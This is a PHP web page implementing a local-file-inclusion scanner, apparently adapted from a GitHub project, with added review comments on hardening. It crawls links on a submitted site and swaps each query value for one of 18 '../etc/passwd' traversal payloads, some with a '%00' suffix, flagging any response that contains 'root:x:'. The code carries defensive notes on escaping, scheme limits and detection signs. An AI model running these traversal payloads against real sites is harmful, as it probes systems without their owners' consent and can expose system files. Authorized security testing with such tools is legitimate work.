- <html>
- <head> <title>+- simple LFI scanner -+</title>
- <body>
- <center><h1>simple LFI scanner</h1>
- <form method='post'>
- source : http://github.com/fakhrizulkifli/Website-Vulnerability-Scanner-v1.0/ <br>
- masukan alamat website : </br></br>
- <input type='text' size='23' name='site' value='' placeholder='contoh http://google.com/'><br>
- <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
- </form>
- <?php
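/**
 * Print the Content-Type header, the Server header and the resolved IP of a site.
 *
 * The page is fetched through con_host(). Both header values are chosen by the
 * remote server and are written into this script's own HTML page, so they are
 * HTML-escaped first; printed raw, a hostile server could inject markup or
 * script into the operator's browser.
 *
 * @param string $site Absolute URL of the site to describe.
 * @return void Output is printed directly; nothing is returned.
 */
function Get_Info($site) {
    $info = con_host($site);
    if (!$info) {
        return;
    }

    $flags = ENT_QUOTES | ENT_SUBSTITUTE;

    // Only print a header line when the header is actually present; the
    // original indexed $type[0] / $server[0] even when nothing matched.
    if (preg_match("/Content-Type:(.+)/", $info, $type)) {
        print "[-] " . htmlspecialchars(trim($type[0]), $flags, 'UTF-8') . "<br>";
    }
    if (preg_match("/Server:(.+)/", $info, $server)) {
        print "[-] " . htmlspecialchars(trim($server[0]), $flags, 'UTF-8') . "<br>";
    }

    // parse_url() yields no host for relative or malformed input.
    $host = parse_url($site, PHP_URL_HOST);
    if (is_string($host) && $host !== '') {
        // gethostbyname() returns its argument unchanged on failure, so the
        // printed value can still be attacker-influenced text.
        print "[-] IP: " . htmlspecialchars(gethostbyname($host), $flags, 'UTF-8') . "<br>";
    }
}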
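/**
 * Fetch a URL with cURL and return the raw response (headers followed by body).
 *
 * The URL ultimately comes from a web form, so the transfer is pinned to
 * http/https. Without that restriction cURL also accepts schemes such as
 * file://, which would let anyone who can reach this page read files from, or
 * pivot through, the machine hosting it. Redirects are held to the same
 * schemes and capped in number.
 * NOTE(review): this does not stop http(s) URLs or redirects that point at
 * internal services; destination filtering would have to be added separately.
 *
 * The Referer and User-Agent are fixed strings, so every request made by this
 * script carries the same dated browser signature, which server-side logs can
 * be matched on.
 *
 * @param string $host Absolute URL to request.
 * @return string|false Response text, or false when the transfer fails or the
 *                      response is empty.
 */
function con_host($host) {
    $ch = curl_init($host);
    if ($ch === false) {
        return false;
    }

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

    // Refuse every protocol except HTTP(S), both for the first request and
    // for any redirect the remote server answers with.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_MAXREDIRS, 5);

    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');

    $pg = curl_exec($ch);

    return $pg ? $pg : false;
}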
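/**
 * Collect the href targets found in a page.
 *
 * The page is fetched through con_host() and every `href=` value is captured
 * with a regular expression; nothing is resolved or de-duplicated. The values
 * are whatever the remote page contains and must be treated as untrusted.
 *
 * @param string $site Absolute URL of the page to read.
 * @return array List of href values; empty when the page cannot be fetched or
 *               has no links. (The original returned null in both cases, which
 *               breaks callers that pass the result to count().)
 */
function find_link($site) {
    $text = con_host($site);
    if (!$text) {
        return array();
    }

    $find = "/href=[\"']?([^\"']+)?[\"']?/i";
    if (!preg_match_all($find, $text, $links)) {
        return array();
    }

    // Capture group 1 already is the list of href values.
    return $links[1];
}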
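/**
 * Probe the links of one page for local-file-inclusion behaviour and print a report.
 *
 * For every link found on the page, the value after the first `=` is replaced
 * by each entry of $list_lfi and the result is requested; a response that
 * contains `root:x:` is reported. The list holds `../` traversal strings aimed
 * at /etc/passwd, with and without a trailing `%00`. The `%00` form depends on
 * null-byte truncation, which PHP has rejected in file paths since 5.3.4.
 * On the receiving side this traffic shows up as bursts of requests whose
 * query values contain `../` sequences; include targets that come from a fixed
 * allow-list are not affected by any of these strings.
 *
 * Hardening compared with the original:
 *  - only http/https URLs with a host are accepted, so the form cannot be used
 *    to make this server fetch other schemes;
 *  - everything echoed into the page (host, path, links) is HTML-escaped,
 *    because it originates from the form or from the remote page;
 *  - user- and page-supplied text is no longer spliced into regex patterns
 *    without quoting;
 *  - links pointing at a different host or scheme are skipped, so the scanned
 *    page cannot steer requests to other systems;
 *  - the link list is fetched once instead of three times.
 *
 * @param string|null $site URL submitted through the form.
 * @return void The report is printed directly.
 */
function lfi($site) {
    $list_lfi = array(
        '../etc/passwd',
        '../../etc/passwd',
        '../../../etc/passwd',
        '../../../../etc/passwd',
        '../../../../../etc/passwd',
        '../../../../../../etc/passwd',
        '../../../../../../../etc/passwd',
        '../../../../../../../../etc/passwd',
        '../../../../../../../../../etc/passwd',
        '../etc/passwd%00',
        '../../etc/passwd%00',
        '../../../etc/passwd%00',
        '../../../../etc/passwd%00',
        '../../../../../etc/passwd%00',
        '../../../../../../etc/passwd%00',
        '../../../../../../../etc/passwd%00',
        '../../../../../../../../etc/passwd%00',
        '../../../../../../../../../etc/passwd%00',
    );
    $allowed = array('http', 'https');
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;

    $request = parse_url((string) $site);
    if (!is_array($request)) {
        $request = array();
    }
    $scheme = isset($request['scheme']) ? strtolower($request['scheme']) : '';
    $host = isset($request['host']) ? $request['host'] : '';
    $path = isset($request['path']) ? $request['path'] : '';

    // Reject anything that is not a plain web URL before any request is made.
    if ($host === '' || !in_array($scheme, $allowed, true)) {
        print "[!] Only http:// and https:// URLs with a host are accepted<br>";
        return;
    }

    print "[-] URL : " . htmlspecialchars($host, $flags, 'UTF-8') . "<br>";
    print "[-] Path: " . htmlspecialchars($path, $flags, 'UTF-8') . "<br>";
    print "[-] Try connect to host<br>";
    $url = $scheme . "://" . $host . $path;
    if (con_host($url)) {
        print "[+] Connect to host successful<br>";
        Get_Info($url);
        print "[-] Finding link on the website<br>";
        $links = find_link($url);
        if (!is_array($links)) {
            $links = array();
        }
        print "[+] Found link : " . count($links) . "<br>";
        print "[-] Finding vulnerable...<br>";

        // Directory part of the submitted path: drop the trailing file name
        // once, by length, instead of regex-replacing it on every iteration.
        $file = explode("/", $path);
        $last = $file[count($file) - 1];
        $dir = substr($path, 0, strlen($path) - strlen($last));
        $host_pattern = "/" . preg_quote($host, "/") . "/";

        foreach ($links as $link) {
            if (!preg_match($host_pattern, $link)) {
                $link = "http://$host/$dir$link";
            }

            // Stay on the submitted host: hrefs come from the remote page and
            // may name any scheme or any other machine.
            $target = parse_url($link);
            if (!is_array($target)
                || !isset($target['scheme'], $target['host'])
                || !in_array(strtolower($target['scheme']), $allowed, true)
                || strcasecmp($target['host'], $host) !== 0) {
                continue;
            }

            foreach ($list_lfi as $error) {
                $link = preg_replace("/=(.+)/", "=$error", $link);
                $body = con_host($link);
                if ($body !== false && preg_match("/root:x:/", $body)) {
                    print "[-]LFI vulnerable : " . htmlspecialchars($link, $flags, 'UTF-8') . "<br>";
                }
            }
        }
        print "[-] Done<br>";
    }
}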
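// Run the scan only when the form was actually submitted. The original read
// $_POST['site'] on every request, including the initial GET of the page.
// NOTE(review): nothing here authenticates the caller, so anyone who can reach
// this page can make the hosting server send requests on their behalf;
// access to the script should be restricted at the web-server level.
if (isset($_POST['site']) && is_string($_POST['site'])) {
    $site = $_POST['site'];
    lfi($site);
}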
- ?>
- </center>
- </body>
- </html>